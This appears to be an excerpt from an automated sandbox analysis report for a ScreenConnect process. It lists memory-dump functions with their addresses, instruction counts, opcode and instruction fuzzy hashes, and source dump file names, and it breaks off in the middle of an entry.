Opcode Fuzzy Hash: bdea3684731a4e7ec6f4676836826ef2eaf59a0a7119bad80faebea029dceda9
Instruction Fuzzy Hash: F741BF30600B458FCB35CF6DC844696BBF2EF8A324B144A5DD1969B6A2D770E90ACF80

Function 01D9EF67 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e50faaa3267f0229dc7eb26b92854d099296ac4c35f90c3c98b125a3b1fab8
Instruction ID: 5f704c9b39d9aae7c05152e6394ee8278653df94391b070896ffbf7ae2d316eb
Opcode Fuzzy Hash: d6e50faaa3267f0229dc7eb26b92854d099296ac4c35f90c3c98b125a3b1fab8
Instruction Fuzzy Hash: 1E415071E0125A9BEF14DFA9C990BDEBBB6EF89700F148129E505B7240DB70A946CB90

Function 01D95DC0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96adf2f2afb9633f9a81153003cbdac2e7bc52b74355710a5a5f8d57cee4afd4
Instruction ID: dc755a34c5f91b9ffdbeb7d6796175bd7698aec679ad70f711565412fcaf6500
Opcode Fuzzy Hash: 96adf2f2afb9633f9a81153003cbdac2e7bc52b74355710a5a5f8d57cee4afd4
Instruction Fuzzy Hash: 36413C317102068FDB16EF78E49466E7BE2EF88250B54847AD506DB365EF75EC01CB90

Function 01D97E50 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f10cbf0ec1fb5c76c32fd68bcb34936ecaedfebb003b4febdff272176699c0
Instruction ID: b924de9c9f4aa733bcc6d0c64f19eaf5ac6991c31854de36c80289e4f5298c67
Opcode Fuzzy Hash: 68f10cbf0ec1fb5c76c32fd68bcb34936ecaedfebb003b4febdff272176699c0
Instruction Fuzzy Hash: E0419C31A00205CBDF15EF68E4946ADBBA6FFC4301F14C569D906AB246DF34EC068F90

Function 01D9AAB0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c71fc593e0c76c2778cdafa06cbe7336a87ae209aa36e117fd9d51b11da7863
Instruction ID: 9fd6955abd3b9d80fb1340b73c12b37a61da1bd1c4dcdbc11a00674ac1e56620
Opcode Fuzzy Hash: 5c71fc593e0c76c2778cdafa06cbe7336a87ae209aa36e117fd9d51b11da7863
Instruction Fuzzy Hash: 37415932B012918FDB209B28D55476FB7E2EF84318F14CA6AD856CB392DB30CC85C791

Function 01D99978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a45ca6338ebd049e45d4b848b8186ad6c8add0402c64302fcfb6f9928c60d3
Instruction ID: a508f4c1a9797baa246700ee62bffecc202372650b3ac7339cd8fa8ee46d008a
Opcode Fuzzy Hash: 50a45ca6338ebd049e45d4b848b8186ad6c8add0402c64302fcfb6f9928c60d3
Instruction Fuzzy Hash: C04149307102159FDB58DB69D864AAEBBE2FF88614F15456DE406EB3A0DF70EC04CB90

Function 01D99974 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298e83efd824c7149e383c485d715808779aa5c1a5ed03208884b22ce2f61b0f
Instruction ID: 2a64bdf49ca28039289678ade70849999d50be582629254c9b023176ce889e2b
Opcode Fuzzy Hash: 298e83efd824c7149e383c485d715808779aa5c1a5ed03208884b22ce2f61b0f
Instruction Fuzzy Hash: 5E4148307102159FDB18DB69D454AAEBBE2FF88610F15456CE406DB3A0DF70EC04CB90

Function 01D97920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3216133c6b188e31ce1a0bb9fc456ab8e490450358e288cae95a5b8a0e36a898
Instruction ID: 02fe419edd34cd28dd03c72a04f6ae5f6b901a9ec2c00814cf9b3331818a754c
Opcode Fuzzy Hash: 3216133c6b188e31ce1a0bb9fc456ab8e490450358e288cae95a5b8a0e36a898
Instruction Fuzzy Hash: 3A315C30B102058BEF149EA9C4546AFFBF6EF89254F10846AE50AE7354DB74ED008B90

Function 01D94C6C Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f66a39be7c282632cec6979250895647cf11716920854b4e1a774ea56a71e7
Instruction ID: 6965ac178ae8285015a9ecbe2557a0100ec738c5e1a2f3807ec4646327240da5
Opcode Fuzzy Hash: 96f66a39be7c282632cec6979250895647cf11716920854b4e1a774ea56a71e7
Instruction Fuzzy Hash: 0B41BB30A00359DFEF609B68D804BAEBBB9FF44300F0085EAC508A7280DB755E49CF92

Function 01D9DC08 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18324faf397a4803f3f6756af192a54ad37dd6045f8ea23a31e7a30103048afd
Instruction ID: 73acc1b78f48a8ca1044f73128b99d9145290b2cce9f66b58041e3a2f08a91b2
Opcode Fuzzy Hash: 18324faf397a4803f3f6756af192a54ad37dd6045f8ea23a31e7a30103048afd
Instruction Fuzzy Hash: 70311A70600B069FDB30CF6DD8846A6BBF2EF89314F104A1CE1969B6A5D770E946CF90

Function 01D952F8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559efed2f0893dc5b50a86f7b11c30d90f01d46a2afd7e5ebbf672fa8f2160ee
Instruction ID: fc8c6a110a19366274ef6bb5f5507e1f403c5ee9c114aaab4a02c4a0e23e4c8f
Opcode Fuzzy Hash: 559efed2f0893dc5b50a86f7b11c30d90f01d46a2afd7e5ebbf672fa8f2160ee
Instruction Fuzzy Hash: A0315AB1D043099FCF14DFAAD4446EEBFF4EF88320F10846AD519A7340DB79A9468BA5

Function 01D96568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad65d33e09165ef9a86b4aee9d765513dbf165d1053ed0057ebb6dce9e95c92
Instruction ID: 8b8f7d8fecfbf70f3def9ebd750ce68bd5a2210ccfbdfbcc938374c945d6710d
Opcode Fuzzy Hash: fad65d33e09165ef9a86b4aee9d765513dbf165d1053ed0057ebb6dce9e95c92
Instruction Fuzzy Hash: 1A31D7306007018FDB30DF2AC854A6ABBF1EF89354B144A6DD596DB7A5DB30F946CB90

Function 01D936B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e7184bb5c68c3a1d3080e9699d79e7ec62fe9ca8b4be2cf2144a32de63280c3
Instruction ID: 9023b9ca24e0494d85c964987076a08511f026cb69fc7dd24716ae7c126dc0d1
Opcode Fuzzy Hash: 3e7184bb5c68c3a1d3080e9699d79e7ec62fe9ca8b4be2cf2144a32de63280c3
Instruction Fuzzy Hash: AC313470A04345EFCF04DFB4E94869EBBB5FF49214B1041AADA1AD7241DB34DD01CB61

Function 01D9DC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b4820eb8d55c6c32c8868245cb423f1c20cf576674edf19400da84dca97529
Instruction ID: 237fdf56f47681451e2c7ed78c1cae7d6886381446888c6d24e2ac3e994d40ef
Opcode Fuzzy Hash: e8b4820eb8d55c6c32c8868245cb423f1c20cf576674edf19400da84dca97529
Instruction Fuzzy Hash: 0B31D470600B468FDB30DF6DD8446AABBF2EF89324B104A1CD1969B6A5D770E946CF80

Function 01D990A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d36db64fc45ad1b362810d470fa529c02e1f72c719fc5cd7af77b7aef013e6
Instruction ID: 80f640e89c6ffddab4cccfc24aca3173069d4f7f7521a17210ac2d2a5697cea4
Opcode Fuzzy Hash: c7d36db64fc45ad1b362810d470fa529c02e1f72c719fc5cd7af77b7aef013e6
Instruction Fuzzy Hash: 893158706007018FDB34CF29C898A6ABBF1FF89314B144A1CE49ADB3A0D730E945CB91

Function 01D9DDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d6c72e68e509c6fdb6c0aac37305083e7210f49c3e52ac2e45ce105bda7971
Instruction ID: 9e0f9d7deca964edae2dd830083c80d50ec4523950fa67502ba8e67748db901a
Opcode Fuzzy Hash: f0d6c72e68e509c6fdb6c0aac37305083e7210f49c3e52ac2e45ce105bda7971
Instruction Fuzzy Hash: 31310930600B018FDB30DF6AD84466ABBF2EF99310B104A1CD5A69B7A1D730E946CF90

Function 01D9E4F9 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d54e5b33eea6b8f64a346cc21447cbc41bb8bc21a2cabf1009a8538a95c1b3a
Instruction ID: c441c451efa1ad68666336e416057d63e31a3ced618d3e2d8b9e0de23f0b0463
Opcode Fuzzy Hash: 2d54e5b33eea6b8f64a346cc21447cbc41bb8bc21a2cabf1009a8538a95c1b3a
Instruction Fuzzy Hash: 89219531B012059BDB58DAB9C855BAFBB76BBC8650F14842DE106E7284EE71EC11CB54

Function 01CBD59C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca2d0c814b72a5cfa980f1582cbb62181b40716b2fc977d8d49f37f4bdd33fb
Instruction ID: aaf122b68204766689e864f0cb0f6caab7003633fa9759ac57c6a8bc7d7e7498
Opcode Fuzzy Hash: 0ca2d0c814b72a5cfa980f1582cbb62181b40716b2fc977d8d49f37f4bdd33fb
Instruction Fuzzy Hash: 6E2145B6104204EFDB05DF44D9C0BB6BF65FB88328F20856DE90A8B256C336D45ACAA1

Function 01D98C20 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886f04dc74cb0bcfeeacfc4466cb19c7a1db0505a301e6b5be9bb23d9616d189
Instruction ID: de19c531eff1b4db6ca9c609714265c84ac48431eae3d7df91e7535cd5bee993
Opcode Fuzzy Hash: 886f04dc74cb0bcfeeacfc4466cb19c7a1db0505a301e6b5be9bb23d9616d189
Instruction Fuzzy Hash: 46210871B002069BEF04D764E8906AD7FA2FFD5610F54851AD505EB381DFB4AC06DBD1

Function 01D936A0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5fd9c3905d2788a73414bd53fde08fa8fb3213b9eed303a5542475f2efd4f6
Instruction ID: 7d88037584ddff226e55c9d570b54de7397012b925c62e9f0bc3d5bc50055527
Opcode Fuzzy Hash: 1d5fd9c3905d2788a73414bd53fde08fa8fb3213b9eed303a5542475f2efd4f6
Instruction Fuzzy Hash: 6C21D175A00211DFCF249BB8E9485AEBBB1FF592247148165D91AD7394DB30DC02CB51

Function 01D9E198 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0884f1670db5fac5238299b5a629619f84c19714f9106047b022284ab840261
Instruction ID: 292d95fa8cb32a7c8b0aaab06b15a1e4095b846077b8cf69c5f2081d76a5f126
Opcode Fuzzy Hash: e0884f1670db5fac5238299b5a629619f84c19714f9106047b022284ab840261
Instruction Fuzzy Hash: B3216671A002099FDB04DB68DC919EEBBF5FF89314B50852AE519EB311EB70ED06DB90

Function 01D9F878 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef89d2ed8db925cd5747b1083a965a3bd8e33c2d0005f8fbd343b1193b91ab85
Instruction ID: fed7ad91134dc05794e636a5109ec27e353c674a47b4c22f3eb4649c0b560f4b
Opcode Fuzzy Hash: ef89d2ed8db925cd5747b1083a965a3bd8e33c2d0005f8fbd343b1193b91ab85
Instruction Fuzzy Hash: 502116B68002499FDF10CF9AD844ADEBFF5FF88310F14841AE918A7211D379A556CFA1

Function 01D986D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af957bf9bff053b38ba07d31a4d45d2130f51427eee903e278ee35f2f5a85e02
Instruction ID: 7c29dea0a39e09029bc390f9e7034fc1a699b5c62223faea1883d03615b19cd1
Opcode Fuzzy Hash: af957bf9bff053b38ba07d31a4d45d2130f51427eee903e278ee35f2f5a85e02
Instruction Fuzzy Hash: 55213E306006059FDB34CF29D84469ABBF1EF89720F108A2DD593976A1DB31F95ACF90

Function 01D9F2CC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e8db3519e46e66c6815031cf9b925a1c472ea04d2d832c15f511f4a591654d
Instruction ID: 876245b31d2de1b145a9e29587d5dbac958badd02f81f4e7092af42c0411733c
Opcode Fuzzy Hash: b6e8db3519e46e66c6815031cf9b925a1c472ea04d2d832c15f511f4a591654d
Instruction Fuzzy Hash: AD2125B680024ADFDF10CF9AD944ADEBFF5FB88310F14852AE914A7210D379A555CFA1

Function 01D9E168 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5f24b9bd62c8d89025c64604bfebc52322c79f0e7cebdf75ee7c0c29d0c306
Instruction ID: c8be62f30e2d84b837c2ceb75bc679047b5a62f5ad0c05a379f54ff4ce7c756f
Opcode Fuzzy Hash: fd5f24b9bd62c8d89025c64604bfebc52322c79f0e7cebdf75ee7c0c29d0c306
Instruction Fuzzy Hash: 301184316006069FDB05DBA8EC919AEBBB1FFC9214B40856AD509EB321DB70AD05DB90

Function 01D9A7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd68c4256e407f9f9cb4ad462b6ddcc850d22407ec2e67032a52c61f6a99344
Instruction ID: a5807984b01ca9af3352f07ef91ba61745449388313c0500b91fd9300e82f552
Opcode Fuzzy Hash: dfd68c4256e407f9f9cb4ad462b6ddcc850d22407ec2e67032a52c61f6a99344
Instruction Fuzzy Hash: 9F21EA71A01705CFDB24DF6DD844A6ABBF1FF48310B108A2DD5A69B694DB74E901CB90

Function 01D9A9A1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4da5464d265d174e413af30299239c4fb7346193ed1987b6cef27a91ca786e
Instruction ID: 158357353628dad4ae81fe41ccc00def0d3f5c16dc6d8701bd918dd9bc508de2
Opcode Fuzzy Hash: dd4da5464d265d174e413af30299239c4fb7346193ed1987b6cef27a91ca786e
Instruction Fuzzy Hash: 82110232A0D3811FDB1B473868604AB7FB5EE8612430945EFD589CB253EE659C0AC7A0

Function 01D9ED74 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e25c997521a6cf9de3b91c8213d65117c304c288ca8a8d5c7f0b42b354f350
Instruction ID: d5cb3481788408cca94049ceac4f78b3c0c0e4e9a26c5cabd060e3939dd643d9
Opcode Fuzzy Hash: f5e25c997521a6cf9de3b91c8213d65117c304c288ca8a8d5c7f0b42b354f350
Instruction Fuzzy Hash: 5D211A31D1070A99CB51EFB9D8505EEF7B4EF99310F10C62AD559B7111FB70A295CB80

Function 01D98C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e09e53f44ffe902cd9204e721f29e6933acf246ecf7dd90a2b4bc29303316f
Instruction ID: 819c279ddd497f020cff3d2d29a6e7dcc13913cbb6be39b8ba7ea465c72cd5d3
Opcode Fuzzy Hash: 58e09e53f44ffe902cd9204e721f29e6933acf246ecf7dd90a2b4bc29303316f
Instruction Fuzzy Hash: 6E119031700206ABEF04EB68E980AAE7BE2EFD5610F509529D505EB384DF74BC059BD1

Function 01D9E1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18672ade46e518a4606383393483f89e704827381a6f768fcaa3007175e4f7a2
Instruction ID: e31f634cf5f95f7049b6d49f45d3b424bf8c5b4a19296fcc891c78a33ab704f6
Opcode Fuzzy Hash: 18672ade46e518a4606383393483f89e704827381a6f768fcaa3007175e4f7a2
Instruction Fuzzy Hash: B5113D30A002099FDB04DBA8D8819AEBBF5FF88214B508529E519AB311EB70ED05DB90

Function 01D98AA0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98bc5ec66bcca02020ec128404b0df58d06dbe6f22e320e3c53f3d8173dfd728
Instruction ID: ab9714754be6776c55d4cfbd1f142c06adbd79f98eef2c1761aff74be10cb7da
Opcode Fuzzy Hash: 98bc5ec66bcca02020ec128404b0df58d06dbe6f22e320e3c53f3d8173dfd728
Instruction Fuzzy Hash: 2311427590010ADFCF01DFA4D9809DEBBF1FF49314B508159DA04BB261D775AE0ACB90

Function 01D991A8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72af871b418839ef6f6ab474e481b6a63dce423983a3e0a68c75e2698c784567
Instruction ID: ddf5a3ddd010394411091494430fc1ba65fd94ff14f7dc20a86ea1412e98be12
Opcode Fuzzy Hash: 72af871b418839ef6f6ab474e481b6a63dce423983a3e0a68c75e2698c784567
Instruction Fuzzy Hash: 2211E571E00205AFDF29CEA9D8906EEBBB6FFC4310F9485AAD514D7155D3728902CB80

Function 01CBD597 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 643f0e498d10770837c3b7a700012bc3888b9ffc5f805c56fa118683f2fec004
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 3B110376404284CFCB06CF44D9C4B66BF72FB84318F24C6A9D8094B257C33AD55ACBA1

Function 01D94E44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528bb5cbf725dc7a4f8fbe9c31d24361e338a465d91d626b4286aca1257b8c46
Instruction ID: 76a0cbda2b27bb36451269b01653e73d7daa5c2f40efc9dcfb7bcf95d9203b00
Opcode Fuzzy Hash: 528bb5cbf725dc7a4f8fbe9c31d24361e338a465d91d626b4286aca1257b8c46
Instruction Fuzzy Hash: 6F2106B2804249DFDF10CF9AD444BDEFBF4EB48324F14842AD519A7240D7B9A545CFA5

Function 01D98A78 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ef8e24c94148587ef07bd1fcf55c426ed4449ab11624b177a7bb62e2ef9281
Instruction ID: e4dc12910099cb63a89e64672f2abc84448596373b6baef1af8e649f7b9b54d1
Opcode Fuzzy Hash: 98ef8e24c94148587ef07bd1fcf55c426ed4449ab11624b177a7bb62e2ef9281
Instruction Fuzzy Hash: C3115236A0050ADFCF01CF98D9808DEB7B1FF45714B558266D605BF222D675AE0BCB90

Function 01D98B30 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3cf56a84eb57d426e5c77befe359b48cdfb5933073205fd8ffb0189248f04f6
Instruction ID: 3b90c815e01cd523bf09631f67d09d6c525d088531afc00eeac0ff276a1bdec6
Opcode Fuzzy Hash: a3cf56a84eb57d426e5c77befe359b48cdfb5933073205fd8ffb0189248f04f6
Instruction Fuzzy Hash: D611CE3190008DDBEF05DFA9D8408CCBBB2EF86324F488526D5057B241DB35A9478B90

Function 01D9FA80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eacb4c17cdecb521af716f465ecf9682b537f41b573993c4c277d59019e47ed
Instruction ID: 24dd3a21a83d17dc03233e08e419646b4b3c2c9e89efe1fd46120f8f4ddba5ff
Opcode Fuzzy Hash: 0eacb4c17cdecb521af716f465ecf9682b537f41b573993c4c277d59019e47ed
Instruction Fuzzy Hash: 6E018F763000148F8708DA6EF49496AF7AAFBD8661355857AE50AC7311CA32DC138754

Function 01D991B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff83f2a6031aebcc38ce6d8c44d47900964b245aa44370332c7cb5a62c28a2c
Instruction ID: d0e499dc520438d0602b7325f5e5dee88882b2fa2e1a5e8d73abcd584a56acbb
